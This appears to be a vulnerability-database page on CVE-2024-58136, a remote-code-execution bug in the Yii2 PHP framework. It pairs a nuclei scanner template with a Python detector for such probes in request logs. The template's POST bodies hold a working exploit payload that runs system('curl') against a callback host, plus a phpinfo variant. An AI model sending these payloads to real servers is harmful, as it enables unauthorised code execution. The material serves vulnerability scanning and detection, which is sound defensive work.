| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-58136 | 10 Apr 2025 00:00 | – | attackerkb |
| The vulnerability of the Yii2::createObject() method in the Yii PHP framework allows an attacker to execute arbitrary code. | 28 May 2025 00:00 | – | bdu_fstec |
| CVE-2024-58136 | 10 Apr 2025 03:40 | – | circl |
| Yiiframework Yii Improper Protection of Alternate Path Vulnerability | 2 May 2025 00:00 | – | cisa_kev |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 2 May 2025 12:00 | – | cisa |
| Yii security vulnerability | 10 Apr 2025 00:00 | – | cnnvd |
| CVE-2024-58136 | 10 Apr 2025 00:00 | – | cve |
| CVE-2024-58136 | 10 Apr 2025 00:00 | – | cvelist |
| yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key | 10 Apr 2025 03:31 | – | github |
| CVE-2024-58136 | 10 Apr 2025 03:15 | – | nvd |
```yaml
id: CVE-2024-58136

info:
  name: Yii2 PHP Framework < 2.0.52 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
  impact: |
    Unauthenticated attackers can exploit improper validation of the __class key in JSON behaviors to instantiate arbitrary PHP classes and achieve remote code execution.
  remediation: |
    Update Yii2 PHP Framework to version 2.0.52 or later to address the remote code execution vulnerability.
  reference:
    - https://infosecwriteups.com/from-behaviors-to-shells-yii2-php-framework-rce-cve-2024-58136-exploit-and-mitigation-e47a60a3cecb
    - https://nvd.nist.gov/vuln/detail/CVE-2024-58136
  classification:
    epss-score: 0.87776
    epss-percentile: 0.9974
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-58136
    cwe-id: CWE-94
    cpe: cpe:2.3:a:yiisoft:yii:2.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: yiisoft
    product: yii
    fofa-query: title="Yii"
    shodan-query: title:"Yii"
  tags: cve,cve2024,yii2,rce,php,framework,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        words:
          - "Yii"
        internal: true

  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}

      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "PHP Version"
          - "PHP Extension"
        condition: and
# digest: 4a0a00473045022100c29ee0f66b1984fd7aaf1cb810b807c29f38a578181f84215718109efad5f8780220626a3fdebb5337185f421bf08e671aa1c3380158ca205d77c12b30de2a9cfda4:922c64590222798bb761d5b6d8e72950
```
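The template's payload shows the shape a defender can look for in traffic or logs: a top-level JSON key of the form `as <name>` (Yii's behavior-attachment convention) whose object carries a `__class` key, plus a `__construct()` key for constructor arguments. The following detection script is an added example, not part of the Vulners page or of the nuclei template; it assumes that convention from the payload above, and the request bodies it scans are constructed samples with the real class names replaced by placeholders. It flags any `__class` or `__construct()` key at any depth of a JSON body, and separately flags behavior-attachment keys at the top level, so it generalizes beyond the single request shape in the template.

```python
import json
from typing import Iterator, Tuple

# Constructed sample request bodies, as a reverse proxy or WAF might log them.
# The first has the shape of the CVE-2024-58136 probe in the template above, with
# the real class names replaced by placeholders; the others are benign or not JSON.
SAMPLE_BODIES = [
    '{"as hack": {"__class": "Acme\\\\Placeholder", '
    '"class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]]}}',
    '{"username": "alice", "password": "hunter2"}',
    '{"profile": {"as": "admin", "__class_name": "ignored"}}',
    'not json at all',
]

# Keys that Yii's object-configuration arrays treat specially; neither should
# ever arrive from an untrusted client.
SUSPICIOUS_KEYS = {"__class", "__construct()"}


def walk(node, path: Tuple[str, ...] = ()) -> Iterator[Tuple[Tuple[str, ...], str]]:
    """Yield (path_to_parent, key) for every object key in a parsed JSON value."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield path, key
            yield from walk(value, path + (key,))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, path + (str(index),))


def find_behavior_injection(body: str) -> list:
    """Return human-readable findings for one request body, or [] if it looks clean.

    Two signals are checked: a top-level key of the form "as <name>" whose value
    is an object (Yii's behavior-attachment convention, as used by the "as hack"
    key in the template's payload), and a "__class" or "__construct()" key at
    any depth. Key matching is exact, so "__class_name" is not a hit.
    """
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []  # not JSON: out of scope for this check
    findings = []
    for path, key in walk(doc):
        if key in SUSPICIOUS_KEYS:
            findings.append(f"{key} at /{'/'.join(path)}")
        elif (not path and isinstance(doc, dict) and key.startswith("as ")
              and isinstance(doc[key], dict)):
            findings.append(f"behavior attachment key {key!r}")
    return findings


def scan(bodies) -> dict:
    """Map each flagged body's index to its findings; clean bodies are omitted."""
    return {i: f for i, b in enumerate(bodies) if (f := find_behavior_injection(b))}


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_BODIES).items():
        print(f"body {index}: {'; '.join(findings)}")
```

Run it on logged request bodies to surface probes of this shape; matches are a strong signal in their own right, and on a patched 2.0.52 deployment they still indicate someone is scanning for the bug.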